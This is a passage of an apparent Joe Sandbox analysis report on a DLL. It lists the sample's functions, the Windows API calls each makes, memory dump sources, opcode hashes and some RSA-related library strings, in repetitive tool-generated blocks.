                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID: RSqb
                                                                                                                                                                                                                                              • API String ID: 4225690600-347567867
                                                                                                                                                                                                                                              • Opcode ID: 14a007ccf47c77533ddc24ce4f3f746d6fc3113936971377a44505935ba98a49
                                                                                                                                                                                                                                              • Instruction ID: 250522bcafc9ba9a79161082e8aa87f11ac3cc6de6e4a8f00944571d96522f6b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14a007ccf47c77533ddc24ce4f3f746d6fc3113936971377a44505935ba98a49
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0316BB0A016189FCB00DFA9CD80B9EB7B9AF99308F30858AE428E7741DB71D9418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF0787 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID: RSa
                                                                                                                                                                                                                                              • API String ID: 4225690600-3169278968
                                                                                                                                                                                                                                              • Opcode ID: c40ccc1dfb6fc7316d807e6674e18c18139defca32ffe44de59857603035f3d8
                                                                                                                                                                                                                                              • Instruction ID: 17e09a17c30d4c40516577a524609eac7305d1ede4b07c220d439ea1037561d1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c40ccc1dfb6fc7316d807e6674e18c18139defca32ffe44de59857603035f3d8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD314BB0A016589FCB00DFA9CD84B5DB7B9AF99308F30859AE428E7751CB71D9428F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF012D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID: RS:h
                                                                                                                                                                                                                                              • API String ID: 4225690600-3891202347
                                                                                                                                                                                                                                              • Opcode ID: 08339ad3a06358a7fe0276542ffa73b0407732dd09751cf608313dc51057a180
                                                                                                                                                                                                                                              • Instruction ID: 52902a08841b94aed3eceb05d5eb2da4b6bf186be3145528926d4c45cafb4062
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 08339ad3a06358a7fe0276542ffa73b0407732dd09751cf608313dc51057a180
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 99314BB0E016589FDB00DFA9CC84B5EB7B9AF99204F30859AE428E7751CB71DD428F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF0237 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID: RS3g
                                                                                                                                                                                                                                              • API String ID: 4225690600-2794631155
                                                                                                                                                                                                                                              • Opcode ID: d2f95b1d28bda9924b96cc3e18953432410aa943bc90f3d47b9c5fd5a43d5574
                                                                                                                                                                                                                                              • Instruction ID: b523358d3882e34a198707ff89e6c2af6a2696b086dcc0444a90aa0f319056c4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d2f95b1d28bda9924b96cc3e18953432410aa943bc90f3d47b9c5fd5a43d5574
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80316BB0A016589FCB00CFA8CC84B9DB7F9AF89208F30869AE428E7741CB71D941CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF2C760 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • type_info::operator!=.LIBCMT ref: 6CF2C7EB
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: type_info::operator!=
                                                                                                                                                                                                                                              • String ID: ModPrime1PrivateExponent$ModPrime2PrivateExponent$MultiplicativeInverseOfPrime2ModPrime1$Prime1$Prime2$PrivateExponent
                                                                                                                                                                                                                                              • API String ID: 2241493438-339133643
                                                                                                                                                                                                                                              • Opcode ID: bb3efa546fc81fa6074ea4af11d424005678d92342519b4a2a8c5f6462c787e4
                                                                                                                                                                                                                                              • Instruction ID: a54c36ead2658e5e34c29631e872ad7bd34a6f6f8fe3266bf1f0f93df8eadb46
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bb3efa546fc81fa6074ea4af11d424005678d92342519b4a2a8c5f6462c787e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B316D71A183459EC7409FB8C84558ABBF1BFD5208F408A6EF5849BB60EB75D948CB82
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF0457 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23B3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23C3
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23D6
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23E9
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF23FC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEF240F
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID: RS%e
                                                                                                                                                                                                                                              • API String ID: 4225690600-1409579784
                                                                                                                                                                                                                                              • Opcode ID: d14e75621a70a28f7a71430954f95fe3748bc93ba1a1e601dce0b9024c575d28
                                                                                                                                                                                                                                              • Instruction ID: dd1413630d12ad44427809f29663709edb93e54a9a86faa5ca22309bf043f19c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d14e75621a70a28f7a71430954f95fe3748bc93ba1a1e601dce0b9024c575d28
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 153169B0A016589FCB10CBA9CC84B9DB7BAAF99308F30859AE468E7741CB71D9418F50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEAA00 Relevance: 12.3, APIs: 8, Instructions: 309COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2610073882-0
                                                                                                                                                                                                                                              • Opcode ID: b24a996ee4b4c0479f20ed277dc1b3d94b4c31373821a65b8cbb77363a722ce6
                                                                                                                                                                                                                                              • Instruction ID: ea394d63e9aba0f3f72acbb470598c399f3abc22b2ffaccea1c0b9d150800eb9
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b24a996ee4b4c0479f20ed277dc1b3d94b4c31373821a65b8cbb77363a722ce6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64C135716087009FC300DF68C88095ABBFABFCC748F248A4DE5999B765D771E845CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE9D00 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEE9DEB
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEE9DFB
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEE9E29
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEE9F25
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEE9FE5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 3214203402-2766056989
                                                                                                                                                                                                                                              • Opcode ID: 7a0c9064e8df8d284bbdf0f0bae2630ab8b95e7442a189f3a7e470f36cee8882
                                                                                                                                                                                                                                              • Instruction ID: c0aef1fbc34d052ed936b77ace19ef56e764b689a93d8596c67e09e1ee9ab1ff
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a0c9064e8df8d284bbdf0f0bae2630ab8b95e7442a189f3a7e470f36cee8882
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32D15971D01249CFDB00DFA9C880AEDBBF5BF88308F64816DE515AB755D731AA46CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEEB300 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 326COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6CEEB3EB
                                                                                                                                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6CEEB3FB
                                                                                                                                                                                                                                              • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 6CEEB429
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEEB525
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 6CEEB5E5
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArraySafe$Bound$ClearDestroyElementVariant
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 3214203402-2766056989
                                                                                                                                                                                                                                              • Opcode ID: 9bd4ba060d37d0b9e3c3c6102364f6925a7ccf936b43b835610b59ec8dd41daa
                                                                                                                                                                                                                                              • Instruction ID: 0b1acf7abc8a1536a653aea2aad2aa589d8d2845300490d03b4b49a95aac81a0
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9bd4ba060d37d0b9e3c3c6102364f6925a7ccf936b43b835610b59ec8dd41daa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CED15A71E01249CFDB00DFA8C880A9DBBB6FF48308F64816DE515AB754D770AA4ACF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF11580 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 277COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF116B2
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF1180A
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • : this key is too short to encrypt any messages, xrefs: 6CF1162A
                                                                                                                                                                                                                                              • exceeds the maximum of , xrefs: 6CF1173F
                                                                                                                                                                                                                                              • for this public key, xrefs: 6CF11771
                                                                                                                                                                                                                                              • : message length of , xrefs: 6CF1170D
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
